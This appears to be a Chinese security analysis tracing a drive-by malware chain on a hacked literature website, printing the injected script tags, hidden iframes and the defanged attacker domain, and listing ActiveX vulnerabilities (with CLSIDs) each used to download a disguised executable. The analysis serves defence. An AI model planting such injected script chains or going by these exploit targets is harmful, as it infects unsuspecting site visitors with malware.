某文学网站上挂的logo.jpg /logo.exe 更新了

网站首页 包含代码：

/---

＜script src="ads/iw_t.js"＞＜/script＞

---/

#1 ads/iw_t.js包含代码：

/---

＜script src='/images/jin.gif'＞＜/script＞

---/

#1.1 /images/jin.gif

输出代码：

/---

＜script language="javascript" src="hxxp://w**w*.shi*t**ip.com/file/my.js"＞＜/script＞

---/

#1.1.1 hxxp://w**w*.shi*t**ip.com/file/my.js 输出代码:

/---

＜script language='javascript' src='hxxp://a**d.shi*t**ip.com/file/ad.js'＞＜/script＞

---/

#1.1.1.1 hxxp://a**d.shi*t**ip.com/file/ad.js 输出代码:

/---

＜iframe name='logo_if' width='0' height='0'＞＜/iframe＞

＜script language='javascript' src='hxxp://w**w*.shi*t**ip.com/file/logo.js'＞＜/script＞

＜iframe name='real2_if' width='0' height='0'＞＜/iframe＞

＜script language='javascript' src='hxxp://w**w*.shi*t**ip.com/file/real2.js'＞＜/script＞

＜iframe name='real_if' width='0' height='0'＞＜/iframe＞

＜script language='javascript' src='hxxp://w**w*.shi*t**ip.com/file/real.js'＞＜/script＞

＜iframe name='lz3_if' width='0' height='0'＞＜/iframe＞

＜script language='javascript' src='hxxp://w**w*.shi*t**ip.com/file/lz3.js'＞＜/script＞

＜iframe name='lz2_if' width='0' height='0'＞＜/iframe＞

＜script language='javascript' src='hxxp://w**w*.shi*t**ip.com/file/lz2.js'＞＜/script＞

＜iframe name='lz_if' width='0' height='0'＞＜/iframe＞

＜script language='javascript' src='hxxp://w**w*.shi*t**ip.com/file/lz.js'＞＜/script＞

＜iframe name='bf_if' width='0' height='0'＞＜/iframe＞

＜script language='javascript' src='hxxp://w**w*.shi*t**ip.com/file/bf.js'＞＜/script＞

＜iframe name='pps_if' width='0' height='0'＞＜/iframe＞

＜script language='javascript' src='hxxp://w**w*.shi*t**ip.com/file/pps.js'＞＜/script＞

＜iframe name='xunlei_if' width='25' height='0'＞＜/iframe＞

＜script language='javascript' src='hxxp://w**w*.shi*t**ip.com/file/xunlei.js'＞＜/script＞

＜iframe name='sdr_if' width='0' height='0'＞＜/iframe＞

＜script language='javascript' src='hxxp://w**w*.shi*t**ip.com/file/sdr.js'＞＜/script＞

＜iframe name='cif_' width='0' height='0'＞＜/iframe＞

＜script language='javascript' src='hxxp://count23.51yes.com/click.aspx?id=238288070&logo=1'＞＜/script＞

---/

#1.1.1.1.1 hxxp://w**w*.shi*t**ip.com/file/logo.js

利用 MS06-014漏洞下载 下载 hxxp://w**w*.shi*t**ip.com/file/images/logo.jpg

#1.1.1.1.2 hxxp://w**w*.shi*t**ip.com/file/real2.js

利用 RealPlayer（rmocx.RealPlayer RAM Download Handler.1，clsid:2F542A2E-EDC9-4BF7-8CB1-87C9919F7F93）漏洞 下载 hxxp://w**w*.shi*t**ip.com/file/images/logo.jpg

#1.1.1.1.3 hxxp://w**w*.shi*t**ip.com/file/real.js

利用 RealPlayer（IERPCtl.IERPCtl.1）漏洞 下载 hxxp://w**w*.shi*t**ip.com/file/images/logo.jpg

#1.1.1.1.4 hxxp://w**w*.shi*t**ip.com/file/lz3.js

利用 联众（HanGamePluginCn18.HanGamePluginCn18.1，clsid:61F5C358-60FB-4A23-A312-D2B556620F20）漏洞 下载 hxxp://w**w*.shi*t**ip.com/file/images/logo.jpg

#1.1.1.1.5 hxxp://w**w*.shi*t**ip.com/file/lz2.js

利用 联众（GLIEDown.IEDown.1，clsid:F917534D-535B-416B-8E8F-0C04756C31A8）漏洞 下载 hxxp://w**w*.shi*t**ip.com/file/images/logo.jpg

#1.1.1.1.6 hxxp://w**w*.shi*t**ip.com/file/lz.js

利用 联众（GLCHAT.GLChatCtrl.1，clsid:AE93C5DF-A990-11D1-AEBD-5254ABDD2B69）漏洞 下载 hxxp://w**w*.shi*t**ip.com/file/images/logo.jpg

#1.1.1.1.7 hxxp://w**w*.shi*t**ip.com/file/bf.js

利用 暴风影音（MPS.StormPlayer，clsid:6BE52E1D-E586-474f-A6E2-1A85A9B4D9FB）漏洞 下载 hxxp://w**w*.shi*t**ip.com/file/images/logo.jpg

#1.1.1.1.8 hxxp://w**w*.shi*t**ip.com/file/pps.js

利用 PPStream（POWERPLAYER.PowerPlayerCtrl.1，clsid:5EC7C511-CD0F-42E6-830C-1BD9882F3458）漏洞 下载 hxxp://w**w*.shi*t**ip.com/file/images/logo.jpg

#1.1.1.1.9 hxxp://w**w*.shi*t**ip.com/file/xunlei.js

利用迅雷（PPlayer.XPPlayer.1，clsid:F3E70CEA-956E-49CC-B444-73AFE593AD7F）漏洞下载 hxxp://w**w*.shi*t**ip.com/file/images/logo.jpg

#1.1.1.1.10 hxxp://w**w*.shi*t**ip.com/file/sdr.js

利用超星阅览器（Pdg2，clsid:7F5E27CE-4A5C-11D3-9232-0000B48A05B2）漏洞下载 hxxp://w**w*.shi*t**ip.com/file/images/logo.jpg